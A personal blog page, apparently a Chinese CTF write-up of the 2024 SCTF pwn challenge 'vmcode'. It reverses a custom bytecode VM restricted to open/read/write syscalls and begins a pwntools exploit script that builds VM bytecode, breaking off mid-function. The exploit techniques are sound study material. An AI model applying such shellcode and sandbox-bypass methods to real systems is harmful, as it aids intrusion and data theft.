<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="M1aoo0bin">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="http://example.com/2024/10/12/sctf-vmcode/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
        <meta name="description" content="因为拖了太久不发索性把这些全做了..\n然而鉴于短时间内入门内核有点困难，所以应该是把这4道做了（">
<meta property="og:type" content="article">
<meta property="og:title" content="2024SCTF pwn题全解（上）">
<meta property="og:url" content="http://example.com/2024/10/12/SCTF-vmcode/index.html">
<meta property="og:site_name" content="Z1naX5">
<meta property="og:description" content="因为拖了太久不发索性把这些全做了..\n然而鉴于短时间内入门内核有点困难，所以应该是把这4道做了（">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://raw.githubusercontent.com/Z1naX5/PicGo/master/images/20241104222939.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Z1naX5/PicGo/master/images/20241104222854.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Z1naX5/PicGo/master/images/20241104223420.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Z1naX5/PicGo/master/images/20241104225241.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Z1naX5/PicGo/master/images/20241104224949.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Z1naX5/PicGo/master/images/20241105180128.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Z1naX5/PicGo/master/images/20241105172958.png">
<meta property="article:published_time" content="2024-10-12T08:33:02.000Z">
<meta property="article:modified_time" content="2024-11-12T18:30:48.472Z">
<meta property="article:author" content="Z1naX5">
<meta property="article:tag" content="学习日志">
<meta property="article:tag" content="Pwn">
<meta property="article:tag" content="复现">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/Z1naX5/PicGo/master/images/20241104222939.png">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/pic/hello.png" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/pic/hello.png">
    <meta name="theme-color" content="#3850AB">
    <link rel="shortcut icon" href="/pic/hello.png">
    <!--- Page Info-->
    
    <title>
        
            2024SCTF pwn题全解（上） -
        
        Zena Xu
    </title>

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">


    <!--- Inject Part-->
    

    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/assets/build/styles.css">

    

    
<link rel="stylesheet" href="/fonts/GeistMono/geist-mono.css">

    
<link rel="stylesheet" href="/fonts/Geist/geist.css">

    <!--- Font Part-->
    
    
    
    

    
        
<script src="/js/libs/anime.min.js"></script>

    

    <script id="hexo-configurations">
    window.config = {"hostname":"example.com","root":"/","language":"en","path":"search.xml"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true,"title_alignment":"left","headings_top_spacing":{"h1":"5rem","h2":"4rem","h3":"2.8rem","h4":"2.5rem","h5":"2.2rem","h6":"2rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":false,"auto":false,"list":[]},"code_block":{"copy":true,"style":"simple","font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":5,"number":true,"expand":true,"init_open":true},"copyright":{"enable":true,"default":"cc_by_nc_sa"},"lazyload":true,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#3850AB","secondary":null,"default_mode":"light"},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://cn.vercount.one/js","enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"preloader":true,"open_graph":true,"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/pic/light_background.jpg","dark":"/pic/dark_background.png"},"title":"Miaoo0bin's Blog","subtitle":{"text":["晚安喵(,,・ω・,,)"],"hitokoto":{"enable":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#363636","dark":"#d2dde8"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":false,"style":"default","links":{"github":null,"instagram":null,"zhihu":null,"twitter":null,"email":null},"qrs":{"weixin":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null,"lrc":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.6.4","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":25},"width":{"home":"1200px","pages":"1200px"},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"Archives":{"path":"/archives/","icon":"fa-regular fa-archive"},"About":{"path":"/about","icon":"fa-regular fa-user"},"Links":{"path":"/links","icon":"fa-regular fa-link"}},"search":{"enable":true,"preload":true},"tags":{"Tags":{"icon":"fa-solid fa-tags","path":"/tags/"}}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"show_on_mobile":true,"links":null},"article_date_format":"auto","categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":10}},"footerStart":"2022/8/17 11:45:14"};
    window.lang_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
<!--        <span class="swup-progress-icon">-->
<!--            <i class="fa-solid fa-circle-notch fa-spin"></i>-->
<!--        </span>-->
    
</div>



    <style>
    :root {
        --preloader-background-color: #fff;
        --preloader-text-color: #000;
    }

    @media (prefers-color-scheme: dark) {
        :root {
            --preloader-background-color: #202124;
            --preloader-text-color: #fff;
        }
    }

    @media (prefers-color-scheme: light) {
        :root {
            --preloader-background-color: #fff;
            --preloader-text-color: #000;
        }
    }

    @media (max-width: 600px) {
        .ml13 {
            font-size: 2.6rem !important; /* Adjust this value as needed */
        }
    }

    .preloader {
        display: flex;
        flex-direction: column;
        gap: 1rem; /* Tailwind 'gap-4' is 1rem */
        align-items: center;
        justify-content: center;
        position: fixed;
        padding: 12px;
        top: 0;
        right: 0;
        bottom: 0;
        left: 0;
        width: 100vw;
        height: 100vh; /* 'h-screen' is 100% of the viewport height */
        background-color: var(--preloader-background-color);
        z-index: 1100; /* 'z-[1100]' sets the z-index */
        transition: opacity 0.2s ease-in-out;
    }

    .ml13 {
        font-size: 3.2rem;
        /* text-transform: uppercase; */
        color: var(--preloader-text-color);
        letter-spacing: -1px;
        font-weight: 500;
        font-family: 'Chillax-Variable', sans-serif;
        text-align: center;
    }

    .ml13 .word {
        display: inline-flex;
        flex-wrap: wrap;
        white-space: nowrap;
    }

    .ml13 .letter {
        display: inline-block;
        line-height: 1em;
    }
</style>

<div class="preloader">
    <h2 class="ml13">
        Zena Xu
    </h2>
    <script>
        var textWrapper = document.querySelector('.ml13');
        // Split text into words
        var words = textWrapper.textContent.trim().split(' ');

        // Clear the existing content
        textWrapper.innerHTML = '';

        // Wrap each word and its letters in spans
        words.forEach(function(word) {
            var wordSpan = document.createElement('span');
            wordSpan.classList.add('word');
            wordSpan.innerHTML = word.replace(/\S/g, "<span class='letter'>$&</span>");
            textWrapper.appendChild(wordSpan);
            textWrapper.appendChild(document.createTextNode(' ')); // Add space between words
        });

        var animation = anime.timeline({loop: true})
            .add({
                targets: '.ml13 .letter',
                translateY: [40,0],
                translateZ: 0,
                opacity: [0,1],
                filter: ['blur(5px)', 'blur(0px)'], // Starting from blurred to unblurred
                easing: "easeOutExpo",
                duration: 1400,
                delay: (el, i) => 300 + 30 * i,
            }).add({
                targets: '.ml13 .letter',
                translateY: [0,-40],
                opacity: [1,0],
                filter: ['blur(0px)', 'blur(5px)'], // Ending from unblurred to blurred
                easing: "easeInExpo",
                duration: 1200,
                delay: (el, i) => 100 + 30 * i,
                complete: function() {
                    hidePreloader(); // Call hidePreloader after the animation completes
                }
            });

        let themeStatus = JSON.parse(localStorage.getItem('REDEFINE-THEME-STATUS'))?.isDark;

        // If the theme status is not found in local storage, check the preferred color scheme
        if (themeStatus === undefined || themeStatus === null) {
            if (window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches) {
                themeStatus = 'dark';
            } else {
                themeStatus = 'light';
            }
        }

        // Now you can use the themeStatus variable in your code
        if (themeStatus) {
            document.documentElement.style.setProperty('--preloader-background-color', '#202124');
            document.documentElement.style.setProperty('--preloader-text-color', '#fff');
        } else {
            document.documentElement.style.setProperty('--preloader-background-color', '#fff');
            document.documentElement.style.setProperty('--preloader-text-color', '#000');
        }

        window.addEventListener('load', function () {
            setTimeout(hidePreloader, 5000); // Call hidePreloader after 5000 milliseconds if not already called by animation
        });

        function hidePreloader() {
            var preloader = document.querySelector('.preloader');
            preloader.style.opacity = '0';
            setTimeout(function () {
                preloader.style.display = 'none';
            }, 200);
        }
    </script>
</div>

<main class="page-container" id="swup">

    

    <div class="main-content-container">


        <div class="main-content-header">
            <header class="navbar-container px-6 md:px-12">

    <div class="navbar-content ">
        <div class="left">
            
                <a class="logo-image" href="/">
                    <img src="/pic/logo.png">
                </a>
            
            <a class="logo-title" href="/">
                
                Zena Xu
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    <i class="fa-regular fa-house fa-fw"></i>
                                    HOME
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/archives/"
                                        >
                                    <i class="fa-regular fa-archive fa-fw"></i>
                                    ARCHIVES
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/about"
                                        >
                                    <i class="fa-regular fa-user fa-fw"></i>
                                    ABOUT
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/links"
                                        >
                                    <i class="fa-regular fa-link fa-fw"></i>
                                    LINKS
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                    
                        <li class="navbar-item search search-popup-trigger">
                            <i class="fa-solid fa-magnifying-glass"></i>
                        </li>
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fa-solid fa-magnifying-glass"></i>
                    </div>
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile sheet -->
    <div class="navbar-drawer h-screen w-full absolute top-0 left-0 bg-background-color flex flex-col justify-between">
        <ul class="drawer-navbar-list flex flex-col px-4 justify-center items-start">
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                HOME
                            </span>
                            
                                <i class="fa-regular fa-house fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/archives/"
                        >
                            <span>
                                ARCHIVES
                            </span>
                            
                                <i class="fa-regular fa-archive fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/about"
                        >
                            <span>
                                ABOUT
                            </span>
                            
                                <i class="fa-regular fa-user fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/links"
                        >
                            <span>
                                LINKS
                            </span>
                            
                                <i class="fa-regular fa-link fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            

            
            
        </ul>

        <div class="statistics flex justify-around my-2.5">
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/tags">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">12</div>
        <div class="label text-third-text-color text-sm">Tags</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/categories">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">0</div>
        <div class="label text-third-text-color text-sm">Categories</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/archives">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">19</div>
        <div class="label text-third-text-color text-sm">Posts</div>
    </a>
</div>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="main-content-body">

            

            <div class="main-content">

                
                    <div class="post-page-container flex relative justify-between box-border w-full h-full">
    <div class="article-content-container">

        <div class="article-title relative w-full">
            
                
                
                <img src="https://raw.githubusercontent.com/Z1naX5/PicGo/master/images/20241104225241.png" alt="2024SCTF pwn题全解（上）" class="w-full h-60 sm:h-72 md:h-80 object-cover sm:rounded-t-large dark:brightness-75"/>
                
                <div class="w-full flex items-center absolute bottom-0 justify-start">
                    <h1 class="article-title-cover text-center mx-6 my-6 text-second-text-color bg-background-color-transparent px-4 py-3 text-3xl sm:text-4xl md:text-5xl font-semibold backdrop-blur-lg rounded-xl border border-border-color ">2024SCTF pwn题全解（上）</h1>
                </div>
            
            </div>

        
            <div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
                <div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
                    <img src="/pic/photo.jpg">
                </div>
                <div class="info flex flex-col justify-between">
                    <div class="author flex items-center">
                        <span class="name text-default-text-color text-lg font-semibold">M1aoo0bin</span>
                        
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2024-10-12 16:33:02</span>
        <span class="mobile">2024-10-12 16:33:02</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2024-11-13 02:30:48</span>
            <span class="mobile">2024-11-13 02:30:48</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/%E5%AD%A6%E4%B9%A0%E6%97%A5%E5%BF%97/">学习日志</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/Pwn/">Pwn</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/%E5%A4%8D%E7%8E%B0/">复现</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
        <span class="article-wordcount article-meta-item">
            <i class="fa-regular fa-typewriter"></i>&nbsp;<span>1.5k Words</span>
        </span>
    
    
        <span class="article-min2read article-meta-item">
            <i class="fa-regular fa-clock"></i>&nbsp;<span>6 Mins</span>
        </span>
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                    </div>
                </div>
            </div>
        

        


        <div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
            <p>_(:3 」∠ )_</p>
<h1 id="2024SCTF"><a href="#2024SCTF" class="headerlink" title="2024SCTF"></a>2024SCTF</h1><p>比赛当天挺忙的，上线很晚，当时感觉可以试试vmcode最后还是没做出来hhh,本来是只有一道字节码的，但是因为blog一直拖着不发加上有复现XCTF的想法，索性一锅端了。</p>
<h2 id="vmcode"><a href="#vmcode" class="headerlink" title="vmcode"></a>vmcode</h2><p>狠狠逆就对了；；<br>自己自定义了一套字节码指令，有一个模拟的栈，在这个虚拟的指令集里面把寄存器调整好再syscall</p>
<p>这道题的切入点在于观察syscall多调试（或者肉眼瞪汇编。。。）</p>
<p>ida解析不出来<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/Z1naX5/PicGo/master/images/20241104222939.png"
                      alt="20241104222939"
                ></p>
<p>先看沙箱开的什么：<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/Z1naX5/PicGo/master/images/20241104222854.png"
                      alt="20241104222854"
                ><br>就是只有orw</p>
<p>追到<code>BUG（）</code>的地方<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/Z1naX5/PicGo/master/images/20241104223420.png"
                      alt="20241104223420"
                ><br>再加上发现在内存里<code>shellcode:</code>的顺序很奇怪<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/Z1naX5/PicGo/master/images/20241104225241.png"
                      alt="20241104225241"
                ><br>一通瞎调看他到这里是怎么输出的</p>
<p>然后发现是把data里的东西一顿调整，压到stack这个数组里，然后再调整寄存器，然后再syscall<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/Z1naX5/PicGo/master/images/20241104224949.png"
                      alt="20241104224949"
                ><br>所以可以猜测 code 是代码部分，stack 是虚拟栈</p>
<h3 id="逆向时间"><a href="#逆向时间" class="headerlink" title="逆向时间"></a>逆向时间</h3><p>先要逆出来<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/Z1naX5/PicGo/master/images/20241105180128.png"
                      alt="20241105180128"
                ><br>这里一段大概就是前面得到 字节码 ，然后 retn 跳转执行code，<br>然后就可以去offset的地方找到对应的偏移,这里<code>rcx</code>像是offset的index,这样可以研究出字节码真正的具体数字</p>
<p>接下来就是把这套指令集对应的意思逆出来，方法大概就是 调or瞪 ：</p>
<p>大概是这样：</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line">rbx-&gt;rbp</span><br><span class="line">rdi-&gt;rsp</span><br><span class="line">rsi-&gt;code_offset</span><br><span class="line"></span><br><span class="line"><span class="number">0x1274</span>:(push rip,ni)</span><br><span class="line"><span class="number">0x1299</span>:(ret)</span><br><span class="line"><span class="number">0x12a7</span>:(xor)</span><br><span class="line"><span class="number">0x12c4</span>:(xchg)</span><br><span class="line">	xchg [rsp],[rsp-<span class="number">8</span>]</span><br><span class="line"></span><br><span class="line"><span class="number">0x12e0</span>:(xchg)</span><br><span class="line">	xchg [rsp],[rsp-<span class="number">10</span>]</span><br><span class="line"></span><br><span class="line"><span class="number">0x12fc</span>:(push <span class="number">4</span> code)</span><br><span class="line"><span class="number">0x1319</span>:(movzx)</span><br><span class="line"><span class="number">0x132e</span>:(pop)</span><br><span class="line"><span class="number">0x1332</span>:(shr)</span><br><span class="line"><span class="number">0x1348</span>:(push_rsp)</span><br><span class="line"><span class="number">0x135c</span>:(shl)</span><br><span class="line"><span class="number">0x1372</span>:(jmp_138c)</span><br><span class="line"><span class="number">0x138c</span>:(ni)</span><br><span class="line"><span class="number">0x13a3</span>:(ror)</span><br><span class="line"></span><br><span class="line"><span class="number">0x13c0</span>:(rol)</span><br><span class="line">	pop rax</span><br><span class="line">	rol rax,[rax-<span class="number">8</span>]</span><br><span class="line">	push rax</span><br><span class="line"></span><br><span class="line"><span class="number">0x13dd</span>:(add)</span><br><span class="line">	pop rax</span><br><span class="line">	<span class="keyword">and</span> [rax],[rax-<span class="number">8</span>]</span><br><span class="line">	push rax</span><br><span class="line"></span><br><span class="line"><span class="number">0x13fa</span>:(syscall)<span class="comment"># 这里描述了一下syscall时的栈上的布局</span></span><br><span class="line">	index --stack--</span><br><span class="line">rbx-&gt;	</span><br><span class="line">		rdx</span><br><span class="line">		rsi</span><br><span class="line">		rdi</span><br><span class="line">		rax</span><br><span class="line">	rdi-&gt;	</span><br><span class="line">	</span><br><span class="line">    syscall</span><br><span class="line">	</span><br><span class="line">    index --stack--</span><br><span class="line">rbx-&gt;	</span><br><span class="line">            rdx</span><br><span class="line">	rdi-&gt;	</span><br><span class="line"></span><br><span class="line"><span class="number">0x1425</span>:(push rsp)</span><br><span class="line"><span class="number">0x1439</span>:(push rip)</span><br></pre></td></tr></table></figure></div>
<p>虽然和code相关的部分有点难逆，但是还好，其实只需要调整栈然后syscall，所以其实有些地方无所谓</p>
<h3 id="编写shellcode"><a href="#编写shellcode" class="headerlink" title="编写shellcode"></a>编写shellcode</h3><p>直接把指令码输进去就好 有的是带参数的就跟在后面 指令会自己读code<br>在write()这里调了一下看了眼栈找了找rdi的位置<br>（此时syscall完全结束，rdi&#x3D;9）<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/Z1naX5/PicGo/master/images/20241105172958.png"
                      alt="20241105172958"
                ></p>
<p>这里exp的函数直接使用了<a class="link"   target="_blank" rel="noopener" href="https://www.bilibili.com/read/cv39270682/" >这位师傅 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a>的exp<br>这道题的复现很多地方也参照了他的<br>exp:</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(log_level = <span class="string">&#x27;debug&#x27;</span>, arch = <span class="string">&#x27;amd64&#x27;</span>, os = <span class="string">&#x27;linux&#x27;</span>)</span><br><span class="line"><span class="comment"># p=remote(&quot;&quot;.)</span></span><br><span class="line">p= process(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">call_offset</span>(<span class="params">off</span>):</span><br><span class="line">    <span class="keyword">return</span> p8(<span class="number">0x21</span>)+p16(off)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">retn</span>():</span><br><span class="line">    <span class="keyword">return</span> p8(<span class="number">0x22</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">xor</span>():</span><br><span class="line">    <span class="keyword">return</span> p8(<span class="number">0x23</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">swap_8_18</span>():</span><br><span class="line">    <span class="keyword">return</span> p8(<span class="number">0x24</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">swap_8_10</span>():</span><br><span class="line">    <span class="keyword">return</span> p8(<span class="number">0x25</span>)</span><br><span class="line">    </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">push_4_byte</span>(<span class="params">content</span>):</span><br><span class="line">    <span class="keyword">return</span> p8(<span class="number">0x26</span>)+p32(content)</span><br><span class="line">    </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">byte_2_8byte</span>():</span><br><span class="line">    <span class="keyword">return</span> p8(<span class="number">0x27</span>)</span><br><span class="line">    </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">pop</span>():</span><br><span class="line">    <span class="keyword">return</span> p8(<span class="number">0x28</span>)</span><br><span class="line">    </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">shr8</span>():</span><br><span class="line">    <span class="keyword">return</span> p8(<span class="number">0x29</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">copy_and_push</span>():</span><br><span class="line">    <span class="keyword">return</span> p8(<span class="number">0x2a</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">shl8</span>():</span><br><span class="line">    <span class="keyword">return</span> p8(<span class="number">0x2b</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">jump_off_if_zero</span>(<span class="params">off</span>):</span><br><span class="line">    <span class="keyword">return</span> p8(<span class="number">0x2c</span>)+p16(off)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">ror</span>():</span><br><span class="line">    <span class="keyword">return</span> p8(<span class="number">0x2d</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">rol</span>():</span><br><span class="line">    <span class="keyword">return</span> p8(<span class="number">0x2e</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">and_0_1</span>():</span><br><span class="line">    <span class="keyword">return</span> p8(<span class="number">0x2f</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">syscall</span>():</span><br><span class="line">    <span class="keyword">return</span> p8(<span class="number">0x30</span>)</span><br><span class="line">    </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">push_rsp</span>():</span><br><span class="line">    <span class="keyword">return</span> p8(<span class="number">0x31</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">push_rip</span>():</span><br><span class="line">    <span class="keyword">return</span> 